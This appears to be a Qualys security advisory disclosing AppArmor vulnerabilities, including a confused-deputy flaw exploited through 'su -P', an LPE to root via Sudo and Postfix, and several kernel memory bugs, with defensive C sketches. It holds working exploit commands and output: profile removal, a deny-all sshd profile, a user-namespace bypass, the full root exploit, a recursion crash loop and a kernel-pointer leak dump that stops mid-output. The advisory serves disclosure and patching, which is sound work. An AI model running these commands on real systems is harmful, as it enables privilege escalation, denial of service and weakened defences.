Qualys Security Advisory

CrackArmor: Multiple vulnerabilities in AppArmor


========================================================================
Contents
========================================================================

Summary
The confused-deputy problem
- Removing an existing profile
- Loading a new profile
- Bypassing Ubuntu's user-namespace restrictions
AppArmor + Sudo + Postfix = root
Kernel vulnerabilities
- An uncontrolled recursion
- An out-of-bounds read
- A use-after-free
- A double-free
Acknowledgments
Timeline

Inspired by Jann Horn's "Mitigations are attack surface, too":

https://projectzero.google/2020/02/mitigations-are-attack-surface-too.html


========================================================================
Summary
========================================================================

We discovered multiple vulnerabilities in AppArmor, a Linux Security Module (LSM) that is enabled by default in major distributions such as Ubuntu, Debian, and SUSE (Android and Red Hat derivatives use another LSM, SELinux, instead of AppArmor).

First, we discovered a fundamental vulnerability (a "confused-deputy" problem) that allows an unprivileged local attacker to load, replace, and remove arbitrary AppArmor profiles, and consequently:

a/ weaken the system's defenses, by removing existing AppArmor profiles that are supposed to protect key programs and services from local and remote attackers (for example, the profiles for cupsd and rsyslogd);

b/ carry out a denial-of-service attack against the system, by loading new restrictive AppArmor profiles (for example, a "deny all" profile for sshd would prevent any legitimate user from logging into the system remotely);

c/ bypass Ubuntu's unprivileged user-namespace restrictions (even if all publicly known bypasses were fixed), by loading a new arbitrary "userns" AppArmor profile (which allows an unprivileged local attacker to create user namespaces with full capabilities).
Second, and perhaps more surprisingly, we were able to transform this first fundamental vulnerability (the ability to load, replace, and remove arbitrary AppArmor profiles) into various Local Privilege Escalations (LPEs) from any unprivileged local user to full root privileges:

a/ in user space, by loading new AppArmor profiles that deny specific syscalls to specific privileged programs (for example, in the default installation of Ubuntu Server 24.04.3 plus the Postfix mail server, we create a "fail-open" situation in Sudo and trivially obtain full root privileges);

b/ in kernel space (where our arbitrary AppArmor profiles are parsed), we discovered various vulnerabilities in AppArmor's code, exploitable by loading, replacing, and removing arbitrary profiles; in particular:

- an uncontrolled recursion that leads to a kernel stack exhaustion and is, to the best of our knowledge, a denial-of-service only (a complete system crash), because no kernel stack allocation is large enough to jump over the CONFIG_VMAP_STACK guard page;

- an out-of-bounds read after an 8KB kmalloc()ed buffer, which allows us to disclose 64KB of kernel memory (including numerous kernel pointers randomized by KASLR) on at least Ubuntu 24.04.3 and Debian 13.1;

- a use-after-free in the kmalloc-192 slab cache, exploitable on at least Ubuntu 24.04.3 and Debian 13.1 (an LPE to full root privileges) despite the CONFIG_RANDOM_KMALLOC_CACHES mitigation (which is enabled by default in Ubuntu 24.04.3);

- a double-free in any slab cache between kmalloc-8 and kmalloc-256, exploitable on at least Debian 13.1 (an LPE to full root privileges) despite the "dedicated slab buckets for memdup_user()" mitigation (CONFIG_SLAB_BUCKETS, enabled by default in Debian 13.1).
Note: in total, we discovered 9 (nine) vulnerabilities in AppArmor, but we have not detailed all of them in this advisory:

- "[PATCH 01/11] apparmor: validate DFA start states are in bounds in unpack_pdb" (an out-of-bounds read);

- "[PATCH 02/11] apparmor: fix memory leak in verify_header" (a memory leak);

- "[PATCH 03/11] apparmor: replace recursive profile removal with iterative approach" and "[PATCH 04/11] apparmor: fix: limit the number of levels of policy namespaces" (the uncontrolled recursion detailed in this advisory);

- "[PATCH 05/11] apparmor: fix side-effect bug in match_char() macro usage" (the out-of-bounds read detailed in this advisory);

- "[PATCH 06/11] apparmor: fix missing bounds check on DEFAULT table in verify_dfa()" (an out-of-bounds read and write);

- "[PATCH 07/11] apparmor: Fix double free of ns_name in aa_replace_profiles()" (the double-free detailed in this advisory);

- "[PATCH 08/11] apparmor: fix unprivileged local user can do privileged policy management" (the confused-deputy problem detailed in this advisory);

- "[PATCH 09/11] apparmor: fix differential encoding verification" (an infinite loop);

- "[PATCH 10/11] apparmor: fix race on rawdata dereference" and "[PATCH 11/11] apparmor: fix race between freeing data and fs accessing it" (the use-after-free detailed in this advisory).

Last-minute note: unfortunately, no CVEs have been assigned to these vulnerabilities yet, because "CVEs are assigned after-the-fact"; from http://www.kroah.com/log/blog/2026/02/16/linux-cve-assignment-process/:

"CVE ids are usually assigned on a one to two week delay from when the fix has landed in a released stable kernel version. This allows users who are regularly taking the Linux stable releases to ensure that their systems are secure before CVEs are announced to the world."
========================================================================
The confused-deputy problem
========================================================================

From https://en.wikipedia.org/wiki/Confused_deputy_problem:

"In information security, a confused deputy is a computer program that is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system."

We recently noticed that the pseudo-files to load, replace, and remove AppArmor profiles are world-writable (mode 0666); in other words, any unprivileged local user can open() these files in O_WRONLY mode:

------------------------------------------------------------------------
$ grep PRETTY_NAME= /etc/os-release
PRETTY_NAME="Ubuntu 24.04.3 LTS"

$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ ls -l /sys/kernel/security/apparmor/{.load,.replace,.remove}
-rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.replace
------------------------------------------------------------------------

Unsurprisingly, however, although open()ing these files in O_WRONLY mode succeeds, actually write()ing to them as an unprivileged user fails with an EACCES error ("Permission denied"):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ strace echo whatever > /sys/kernel/security/apparmor/.remove
...
write(1, "whatever\n", 9)               = -1 EACCES (Permission denied)
...
------------------------------------------------------------------------

------------------------------------------------------------------------
# dmesg
...
apparmor="STATUS" operation="profile_remove" info="not policy admin" error=-13 profile="unconfined" pid=1184 comm="echo"
------------------------------------------------------------------------

This immediately reminded us of historical Linux kernel vulnerabilities such as CVE-2012-0056 (Mempodipper), CVE-2013-1959, and the more recent ns_last_pid:

https://git.zx2c4.com/CVE-2012-0056/about/ (by Jason Donenfeld)
https://www.openwall.com/lists/oss-security/2013/04/29/1 (by Andy Lutomirski)
https://www.openwall.com/lists/oss-security/2025/06/03/5 (by Vegard Nossum)

All of these vulnerabilities were exploited by:

- open()ing a pseudo-file such as /proc/pid/mem, /proc/pid/uid_map, or /proc/sys/kernel/ns_last_pid (as an unprivileged user) in O_WRONLY or O_RDWR mode, and dup2()ing the resulting file descriptor to stdout or stderr;

- execve()ing a privileged program such as su, gpasswd, or newgrp and forcing it to write() a partly controlled string to stdout or stderr, and hence to the pseudo-file in /proc (this write() succeeds because the program is privileged; it would otherwise fail with an EACCES or EPERM error).

We therefore tried to write() to AppArmor's pseudo-files via the stderr of a privileged program (su), and confirmed that, incredibly, AppArmor is indeed vulnerable. This time, write() did not fail with EACCES ("not policy admin") but with ENOENT ("profile does not exist"), because the string that su wrote to stderr is not the name of an existing AppArmor profile:

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ su whatever 2>/sys/kernel/security/apparmor/.remove
------------------------------------------------------------------------

------------------------------------------------------------------------
# dmesg
...
apparmor="STATUS" operation="profile_remove" info="profile does not exist" error=-2 profile="unconfined" name=0A pid=1197 comm="su"
------------------------------------------------------------------------

To fully exploit this vulnerability (in particular, to load arbitrary AppArmor profiles), we must find a privileged program that can be forced into write()ing completely controlled strings, including null bytes, to its stdout or stderr. We searched high and low, and eventually found su in pty mode (its -P or --pty option), which is installed by default and effectively acts as a privileged proxy between two unprivileged programs (the program that executes su, and the program that is executed by su as our unprivileged user).

Consequently, we now have the ability to load, replace, and remove arbitrary AppArmor profiles.


========================================================================
Removing an existing profile
========================================================================

To remove an existing AppArmor profile (for example, the profile for rsyslogd) as an unprivileged local user, we simply write() the name of this profile to AppArmor's .remove file, via su's stdout in pty mode (note: su's password prompt below is obviously for our unprivileged user, not for root):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ ls -l /sys/kernel/security/apparmor/policy/profiles/*rsyslogd*
total 0
-r--r--r-- 1 root root 0 Oct 14 12:17 attach
-r--r--r-- 1 root root 0 Oct 14 12:17 learning_count
-r--r--r-- 1 root root 0 Oct 14 12:17 mode
-r--r--r-- 1 root root 0 Oct 14 12:17 name
lr--r--r-- 1 root root 0 Oct 14 12:17 raw_abi -> ../../raw_data/93/abi
lr--r--r-- 1 root root 0 Oct 14 12:17 raw_data -> ../../raw_data/93/raw_data
lr--r--r-- 1 root root 0 Oct 14 12:17 raw_sha256 -> ../../raw_data/93/sha256
-r--r--r-- 1 root root 0 Oct 14 12:17 sha256

$ su -P -c 'stty raw && echo -n rsyslogd' "$USER" > /sys/kernel/security/apparmor/.remove
Password: 

$ ls -l /sys/kernel/security/apparmor/policy/profiles/*rsyslogd*
ls: cannot access '/sys/kernel/security/apparmor/policy/profiles/*rsyslogd*': No such file or directory
------------------------------------------------------------------------


========================================================================
Loading a new profile
========================================================================

To load a new AppArmor profile (for example, a "deny all" profile for sshd) as an unprivileged local user, we first compile this profile into a binary form with apparmor_parser, and then write() this binary profile to AppArmor's .load file, via su's stdout in pty mode (note: we load an empty profile below, instead of an explicit "deny all" profile, because AppArmor profiles are already allow-lists by default):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ ls -l /sys/kernel/security/apparmor/policy/profiles/*sshd*
ls: cannot access '/sys/kernel/security/apparmor/policy/profiles/*sshd*': No such file or directory

$ apparmor_parser -K -o sshd.pf << "EOF"
/usr/sbin/sshd {
}
EOF

$ su -P -c 'stty raw && cat sshd.pf' "$USER" > /sys/kernel/security/apparmor/.load
Password: 

$ ls -l /sys/kernel/security/apparmor/policy/profiles/*sshd*
total 0
-r--r--r-- 1 root root 0 Oct 14 17:01 attach
-r--r--r-- 1 root root 0 Oct 14 17:01 learning_count
-r--r--r-- 1 root root 0 Oct 14 17:01 mode
-r--r--r-- 1 root root 0 Oct 14 17:01 name
lr--r--r-- 1 root root 0 Oct 14 17:01 raw_abi -> ../../raw_data/105/abi
lr--r--r-- 1 root root 0 Oct 14 17:01 raw_data -> ../../raw_data/105/raw_data
lr--r--r-- 1 root root 0 Oct 14 17:01 raw_sha256 -> ../../raw_data/105/sha256
-r--r--r-- 1 root root 0 Oct 14 17:01 sha256

$ ssh localhost
kex_exchange_identification: read: Connection reset by peer
Connection reset by 127.0.0.1 port 22
------------------------------------------------------------------------


========================================================================
Bypassing Ubuntu's user-namespace restrictions
========================================================================

To bypass Ubuntu's unprivileged user-namespace restrictions, we load a new "userns" AppArmor profile for /usr/bin/time. This profile then allows us to create unprivileged user namespaces with full capabilities, even if all publicly known bypasses (aa-exec, busybox, and LD_PRELOAD) were fixed:

https://www.qualys.com/2025/three-bypasses-of-Ubuntu-unprivileged-user-namespace-restrictions.txt
https://discourse.ubuntu.com/t/understanding-apparmor-user-namespace-restriction/58007
https://u1f383.github.io/linux/2025/06/26/the-journey-of-bypassing-ubuntus-unprivileged-namespace-restriction.html (by Pumpkin Chang)

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ sysctl kernel.apparmor_restrict_unprivileged_unconfined
kernel.apparmor_restrict_unprivileged_unconfined = 1

$ unshare -U -r -m /bin/sh
unshare: write failed /proc/self/uid_map: Operation not permitted

$ aa-exec -p trinity -- unshare -U -r -m /bin/sh
unshare: write failed /proc/self/uid_map: Operation not permitted

$ apparmor_parser -K -o time.pf << "EOF"
/usr/bin/time flags=(unconfined) {
  userns,
}
EOF

$ su -P -c 'stty raw && cat time.pf' "$USER" > /sys/kernel/security/apparmor/.replace
Password: 

$ /usr/bin/time -- unshare -U -r -m /bin/sh
# mount --bind /etc/passwd /etc/passwd
# mount
...
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/passwd type ext4 (rw,relatime)
------------------------------------------------------------------------


========================================================================
AppArmor + Sudo + Postfix = root
========================================================================

Did you get your disconnection notice?
Mine came in the mail today
-- Sonic Youth, "Disconnection Notice"

For an unprivileged local attacker, the ability to load, replace, and remove arbitrary AppArmor profiles is remarkable, but our crucial and burning question was: can this ability be transformed into an LPE to full root privileges? Our key idea was to load new AppArmor profiles that deny certain syscalls to certain privileged programs, and consequently to create exploitable "fail-open" situations.

From our work on Baron Samedit, we remembered that when Sudo encounters an unusual situation, it sends a mail to the system's administrator. To send such a mail on Ubuntu, Sudo executes /usr/sbin/sendmail as our unprivileged user, not as root, with our original environment variables preserved. The exceptions are the obviously dangerous variables such as LD_AUDIT and LD_PRELOAD, which the dynamic loader, ld.so, removes from the environment before Sudo's main() function runs.

From CVE-2002-0043:

https://www.sudo.ws/security/advisories/postfix/ (by Sebastian Krahmer)

we also remembered the following: if the Postfix mail server is installed on the system, and if Postfix's /usr/sbin/sendmail is executed as root but with user-controlled environment variables (in particular, the MAIL_CONFIG environment variable), then the unprivileged user can force Postfix into executing arbitrary commands as root.

Our burning question therefore became: suppose that we, as an unprivileged local attacker, load a new AppArmor profile that denies the setuid capability (CAP_SETUID) to Sudo, thereby potentially preventing Sudo from dropping its root privileges before it executes Postfix's /usr/sbin/sendmail. If we then execute Sudo with a MAIL_CONFIG environment variable that points to our own Postfix configuration in /tmp, is the /usr/bin/id command from our Postfix configuration executed as root?
The answer:

------------------------------------------------------------------------
$ grep PRETTY_NAME= /etc/os-release
PRETTY_NAME="Ubuntu 24.04.3 LTS"

$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ dpkg -S /usr/sbin/sendmail
postfix: /usr/sbin/sendmail

$ mkdir /tmp/postfix

$ cat > /tmp/postfix/main.cf << "EOF"
command_directory = /tmp/postfix
EOF

$ cat > /tmp/postfix/postdrop << "EOF"
#!/bin/sh
/usr/bin/id >> /tmp/postfix/pwned
EOF

$ chmod -R 0755 /tmp/postfix

$ apparmor_parser -K -o sudo.pf << "EOF"
/usr/bin/sudo {
  allow file,
  allow signal,
  allow network,
  allow capability,
  deny capability setuid,
}
EOF

$ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace
Password: 

$ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever
sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
sudo: unable to open /etc/sudoers: Operation not permitted
sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
sudo: error initializing audit plugin sudoers_audit

$ cat /tmp/postfix/pwned
uid=0(root) gid=1001(jane) groups=1001(jane),100(users)
^^^^^^^^^^^
------------------------------------------------------------------------

The surprising sequence of events that led to this LPE as root is:

- in sudoers_init(), Sudo calls setresuid(0, -1, -1) to set its real uid to 0 (PERM_ROOT), which succeeds because its effective and saved uids are already 0 (Sudo is SUID-root);

- in open_sudoers() (more precisely, in open_file()), Sudo calls setresuid(-1, 1, -1) to temporarily set its effective uid to 1 (PERM_SUDOERS), which fails (with EPERM, "Operation not permitted") because none of Sudo's uids is 1 (they are all 0) and because Sudo does not have CAP_SETUID (our AppArmor profile denies it);

- back in sudoers_init(), Sudo calls mail_parse_errors() to send a mail to the administrator about this setresuid() failure ("problem parsing sudoers", "unable to open /etc/sudoers: Operation not permitted");

- then, in exec_mailer(), Sudo calls setuid(0) (at line 331 below) to set all of its uids to 0, which succeeds because they are already 0;

- still in exec_mailer(), Sudo calls setuid(1001) (at line 336) to permanently set all of its uids to our unprivileged user's uid, which fails (with EPERM, "Operation not permitted") because none of Sudo's uids is 1001 (they are all 0) and because Sudo does not have CAP_SETUID (our AppArmor profile denies it);

- finally, and despite this setuid() failure, Sudo's exec_mailer() calls execv() (at line 345) to execute Postfix's /usr/sbin/sendmail with our original environment variables (including our MAIL_CONFIG), as root instead of our unprivileged user (because the setuid(1001) to drop Sudo's root privileges failed).

------------------------------------------------------------------------
284 exec_mailer(int pipein)
...
327     /*
328      * Depending on the config, either run the mailer as root
329      * (so user cannot kill it) or as the user (for the paranoid).
330      */
331     if (setuid(ROOT_UID) != 0) {
332         sudo_debug_printf(SUDO_DEBUG_ERROR, "unable to change uid to %u",
333             ROOT_UID);
334     }
335     if (evl_conf->mailuid != ROOT_UID) {
336         if (setuid(evl_conf->mailuid) != 0) {
337             sudo_debug_printf(SUDO_DEBUG_ERROR, "unable to change uid to %u",
338                 (unsigned int)evl_conf->mailuid);
339         }
340     }
...
342     if (evl_conf->mailuid == ROOT_UID)
343         execve(mpath, argv, (char **)root_envp);
344     else
345         execv(mpath, argv);
------------------------------------------------------------------------

Note: without the ability to load an AppArmor profile that denies CAP_SETUID to Sudo, this "fail-open" situation in Sudo would not be exploitable, for the reasons explained in the "execve() and EAGAIN" section of "man execve".
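The root cause above is that exec_mailer() only logs the failed setuid() and then reaches execv() anyway. As a generic illustration of the opposite, "fail-closed" pattern, here is a minimal C sketch. drop_privileges() and drop_privileges_or_die() are hypothetical helpers of ours, not Sudo's code. They use only POSIX setgid()/setuid() and, for brevity, ignore supplementary groups (setgroups()). In the scenario above, the setuid(1001) would fail with EPERM, and this sketch would exit instead of executing the mailer as root.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper (not Sudo's code): switch the real and effective
 * uid/gid to uid/gid (and, when called as root, the saved ones too).
 * Returns 0 on success and -1 on ANY failure; on -1 the caller must not
 * go on to execute anything. Supplementary groups are left out on purpose.
 */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Change the gid first: once the uid is dropped, setgid() may be refused. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Do not trust the return values alone: check the resulting ids. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;

    /* After dropping root, regaining root must be impossible; if
     * setuid(0) succeeds, report failure so that the caller bails out. */
    if (uid != 0 && setuid(0) != -1)
        return -1;

    return 0;
}

/* Fail-closed wrapper: terminate instead of running the mailer as root. */
void drop_privileges_or_die(uid_t uid, gid_t gid)
{
    if (drop_privileges(uid, gid) != 0) {
        perror("drop_privileges");
        exit(EXIT_FAILURE);
    }
}
```

In exec_mailer(), a call such as drop_privileges_or_die(evl_conf->mailuid, gid) could take the place of lines 335-340. The gid argument here stands for whatever group the caller decides the mailer should run as, a detail this sketch leaves open.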
Last-minute note: while writing a mail to Sudo's maintainer about this "fail-open" situation, we noticed that it was independently discovered, reported, and fixed in November 2025 (commit 3e474c2):

------------------------------------------------------------------------
exec_mailer: Set group as well as uid when running the mailer

Also make a setuid(), setgid() or setgroups() failure fatal.

Found by the ZeroPath AI Security Engineer
------------------------------------------------------------------------

Slightly disappointed by this user-space LPE (because Postfix is not installed by default on Ubuntu anymore), we decided to explore one more idea: maybe AppArmor's kernel code contains vulnerabilities that can be exploited in kernel space by loading, replacing, or removing arbitrary AppArmor profiles?


========================================================================
An uncontrolled recursion
========================================================================

I think I've been there once before
Something tells me there's so much more
-- Sonic Youth, "The Wonder"

The first kernel vulnerability that we discovered in AppArmor's code is an uncontrolled recursion.

An AppArmor profile can contain subprofiles (named "myprofile//mysubprofile" for example), which can themselves contain subprofiles (named "myprofile//mysubprofile//mysubsubprofile" for example), etc. To remove such a profile, AppArmor's kernel code calls __remove_profile(), which first calls __aa_profile_list_release() to remove all of its subprofiles, which then calls __remove_profile() again, etc.; in other words, __remove_profile() is called recursively:

------------------------------------------------------------------------
192 static void __remove_profile(struct aa_profile *profile)
...
198         /* release any children lists first */
199         __aa_profile_list_release(&profile->base.profiles);
------------------------------------------------------------------------
212 void __aa_profile_list_release(struct list_head *head)
...
215         list_for_each_entry_safe(profile, tmp, head, base.list)
216                 __remove_profile(profile);
------------------------------------------------------------------------

Consequently, suppose we create a deeply nested hierarchy of subprofiles (1024 levels in the proof-of-concept below) and then remove the ancestor profile (by write()ing its name to AppArmor's .remove pseudo-file). AppArmor then calls __remove_profile() recursively, exhausts its kernel stack (16KB on x86_64), and crashes the system (because Ubuntu 24.04.3 and Debian 13.1 protect their kernel stacks with CONFIG_VMAP_STACK guard pages).

To load all of these subprofiles in the proof-of-concept below, we first create an AppArmor namespace, by loading a new namespaced profile (named ":mynamespace:myprofile" for example), and enter this AppArmor namespace through a new user namespace (created thanks to our "userns" profile for /usr/bin/time) to obtain full capabilities inside this AppArmor and user namespace.
This allows us to write() to AppArmor's pseudo-files directly (.load, .replace, .remove) instead of write()ing to these files via su's stdout in pty mode. This is not strictly necessary (we could execute su repeatedly, or execute it once and carefully synchronize repeated write()s), but it greatly simplifies our proof-of-concept:

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ ls -l /sys/kernel/security/apparmor/policy/namespaces
total 0

$ apparmor_parser -K -o myns.pf << "EOF"
profile :myns:mypf flags=(unconfined) {
  userns,
}
EOF

$ su -P -c 'stty raw && cat myns.pf' "$USER" > /sys/kernel/security/apparmor/.load
Password: 

$ ls -l /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 5 root root 0 Oct 15 16:04 myns

$ /usr/bin/time -- aa-exec -n myns -p mypf -- unshare -U -r /bin/bash

# pf='a'; for ((i=0; i<1024; i++)); do echo -e "profile $pf { \n }" | apparmor_parser -K -a; pf="$pf//x"; done

# echo -n a > /sys/kernel/security/apparmor/.remove
Write failed: Broken pipe
------------------------------------------------------------------------

To the best of our knowledge, this uncontrolled recursion is only a denial-of-service (not an LPE), because no kernel stack allocation is large enough to jump over the CONFIG_VMAP_STACK guard page (step 3 in the "stack-clash" attack).


========================================================================
An out-of-bounds read
========================================================================

Close your eyes and feel the fun
Pattern recognition is on the run
-- Sonic Youth, "Pattern Recognition"

The second kernel vulnerability that we discovered in AppArmor's code is an out-of-bounds memory read.
When a user-space program that is confined by an AppArmor profile tries to access a file or directory (/etc/passwd or /etc for example), AppArmor decides whether this access should be allowed or denied by matching the filename against an AppArmor Regular Expression (AARE), which is similar to a shell globbing pattern (for example, /etc/*).

In the kernel, AppArmor implements such an AARE with a Deterministic Finite Automaton (DFA) -- essentially a state machine: a set of states, and transitions between these states that depend on the input string to be matched.

To match a string (a filename) against such a DFA, AppArmor calls aa_dfa_match(), which calls match_char() in a loop, once for each byte of the input string. Unfortunately, match_char() is an unsafe macro: it can evaluate its arguments more than once, because of its "} while (1)" loop and the "continue" taken in the MATCH_FLAG_DIFF_ENCODE case at lines 371-372. Moreover, its call at line 457 has a side effect (the increment of the str pointer):

------------------------------------------------------------------------
365 #define match_char(state, def, base, next, check, C)    \
366 do {                                                   \
367         u32 b = (base)[(state)];                       \
368         unsigned int pos = base_idx(b) + (C);          \
369         if ((check)[pos] != (state)) {                 \
370                 (state) = (def)[(state)];              \
371                 if (b & MATCH_FLAG_DIFF_ENCODE)        \
372                         continue;                      \
373                 break;                                 \
374         }                                              \
375         (state) = (next)[pos];                         \
376         break;                                         \
377 } while (1)
------------------------------------------------------------------------
435 aa_state_t aa_dfa_match(struct aa_dfa *dfa, aa_state_t start, const char *str)
...
456         while (*str)
457                 match_char(state, def, base, next, check, (u8) *str++);
------------------------------------------------------------------------

As a result, the str pointer can be incremented more than once inside match_char(), past the string's terminating null byte, without ever passing through the null-byte test at line 456. This leads to out-of-bounds memory reads, after the 8KB buffer where the string (the filename) is kmalloc()ed.

Since we can build our own AppArmor DFA (by loading a new arbitrary profile), we had the idea of transforming this out-of-bounds read into a kernel-memory disclosure. Take, for example, the 6th byte of the string "/etc": the 1st byte is '/', the 5th byte is the terminating null byte '\0', and the 6th byte is the first out-of-bounds byte. To disclose it, we build a DFA that is equivalent to a "?????a*" globbing pattern (but our '?' matches any byte, including a null byte), we load it (by write()ing to AppArmor's .load file), we confine ourselves with it (by write()ing to /proc/self/attr/current), and we try to access /etc in the filesystem:

- if this access is allowed (if our DFA accepts the string "/etc" and the following bytes), then the first out-of-bounds byte is indeed 'a';

- if this access is denied (if our DFA rejects the string "/etc" and the following bytes), then the first out-of-bounds byte is not 'a', and we retry with another DFA, "?????b*", then "?????c*", "?????d*", etc.

In the worst case, this takes 256 tries to disclose one out-of-bounds byte. But we can do much better: we can build a DFA that accepts a whole range of bytes as the 6th byte, for example "?????[\x00-\x7F]*":

- if the access is allowed, then the 6th byte is in the range [\x00-\x7F], and we retry with half of it, "?????[\x00-\x3F]*", etc.;

- if the access is denied, then the 6th byte is in the range [\x80-\xFF], and we retry with half of it, "?????[\x80-\xBF]*", etc.

This binary search takes only 8 tries to disclose one out-of-bounds byte (one try per bit).
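To see why the str++ at line 457 is dangerous, here is a self-contained user-space toy that reproduces only the control flow of match_char(). TOY_MATCH, advance_unsafe(), advance_safe(), and the retries parameter are hypothetical names of ours, not AppArmor code. TOY_MATCH is a do { ... } while (1) macro whose "continue" path re-runs the body and therefore re-evaluates its C argument. That path stands in for the MATCH_FLAG_DIFF_ENCODE case at lines 371-372, and retries stands in for the number of such diff-encoded default transitions taken for one input byte. The safe variant moves the side effect out of the macro argument. This is the kind of change that the title of "[PATCH 05/11]" suggests, but we do not claim it is the actual patch.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Toy stand-in for match_char() (hypothetical, not AppArmor's macro): C is
 * evaluated at the top of every pass through the do { } while (1) loop.
 * While retries > 0, the macro takes the "continue" path, which re-runs
 * the body and therefore evaluates C again.
 */
#define TOY_MATCH(state, retries, C)        \
    do {                                    \
        unsigned int c_ = (C);              \
        if ((retries) > 0) {                \
            (retries)--;                    \
            continue;                       \
        }                                   \
        (state) += c_;                      \
        break;                              \
    } while (1)

/* Unsafe call site, shaped like line 457: the increment lives inside C.
 * Returns how many bytes were consumed to match ONE input byte; buf must
 * hold at least retries + 1 readable bytes. */
size_t advance_unsafe(const unsigned char *buf, int retries)
{
    const unsigned char *str = buf;
    unsigned int state = 0;

    assert(retries >= 0);
    TOY_MATCH(state, retries, *str++);
    (void)state;
    return (size_t)(str - buf);
}

/* Safe call site: fetch and advance exactly once, outside the macro. */
size_t advance_safe(const unsigned char *buf, int retries)
{
    const unsigned char *str = buf;
    unsigned int state = 0;
    unsigned int c = *str++;

    assert(retries >= 0);
    TOY_MATCH(state, retries, c);
    (void)state;
    return (size_t)(str - buf);
}
```

With retries = 2, the unsafe call site consumes three bytes for a single input character, while the safe one consumes exactly one. In aa_dfa_match(), each such extra increment can step over the terminating null byte without the test at line 456 ever seeing it.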
More generally, to disclose the nth byte of the input string (the filename), we build a DFA that has n+2 states:

- state i (1 <= i < n) reads the ith byte of the input string and always transitions to state i+1, independently of the value of the ith byte (this is the "?????" part of our "?????[\x00-\x7F]*" example);

- state n transitions to state n+1 if the nth byte of the input string is in the accepted range, or transitions to state n+2 otherwise (this is the "[\x00-\x7F]" part of our "?????[\x00-\x7F]*" example);

- state n+1 (the accept state) and state n+2 (the reject state) always transition to themselves, until a null byte is read at line 456 (this is the "*" part of our "?????[\x00-\x7F]*" example).

Note: because AppArmor's DFA states are represented by 16-bit integers, we can only disclose 64KB of kernel memory. In the proof-of-concept below, we disclose the bytes from 60KB to 61KB after the 8KB buffer where the filename "/etc/passwd" is kmalloc()ed, including several kernel pointers randomized by KASLR (for example, ffffffffa7ea7420 is aa_global_buffers, ffffffffa6c43480 is shmem_ops, and ffffffffa86b19e0 is noop_backing_dev_info):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users)

$ /usr/bin/time -- aa-exec -n myns -p mypf -- unshare -U -r /bin/bash

# ./infoleak 1 64
0000: 2f/ 65e 74t 63c 2f/ 70p 61a 73s 73s 77w 64d 00. 00. e0. 2c, 80. 1e. 8e. ff. ff. 20. 74t ea. a7. ff. ff. ff. ff. 00. 00. 00. 00.
0020: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0040.

# ./infoleak $((60*1024)) $((61*1024))
0000: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 98. 2d- 80. 1e. 8e. ff. ff. 00. c8. 2d- 80. 1e. 8e. ff. ff. 1b. 00. 00.
0020: 00. 0c. 00. 00. 00. 00. 10. 00. 00. 00. 00. 00. 00. ff. ff. ff. ff. ff. ff. ff. 7f. e0. bd. e2. a7. ff. ff. ff. ff. 80. 344 c4.
0040: a6. ff. ff. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 40@ 2b+ c4. a6. ff. ff. ff. ff. 00. 00. 81.
0060: 70p 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 94. 19. 02. 01. 00. 00. 00. 00. 40@ 08. 49I 80. 1e. 8e. ff. ff. 00. 00. 00.
0080: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 88. 90. 2d- 80. 1e. 8e. ff. ff. 88. 90. 2d-
00a0: 80. 1e. 8e. ff. ff. 01. 00. 00. 00. 08. 00. 00. 00. 20. 22" 29) 80. 1e. 8e. ff. ff. a0. 2b+ c4. a6. ff. ff. ff. ff. 00. 00. 00.
00c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
00e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. 7e~ 2a* 80. 1e. 8e. ff. ff. 80. 12. 72r 83. 1e. 8e. ff. ff. 00. 00. 00.
0100: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. e0. 19. 6bk a8. ff. ff. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 10. c9. 2d-
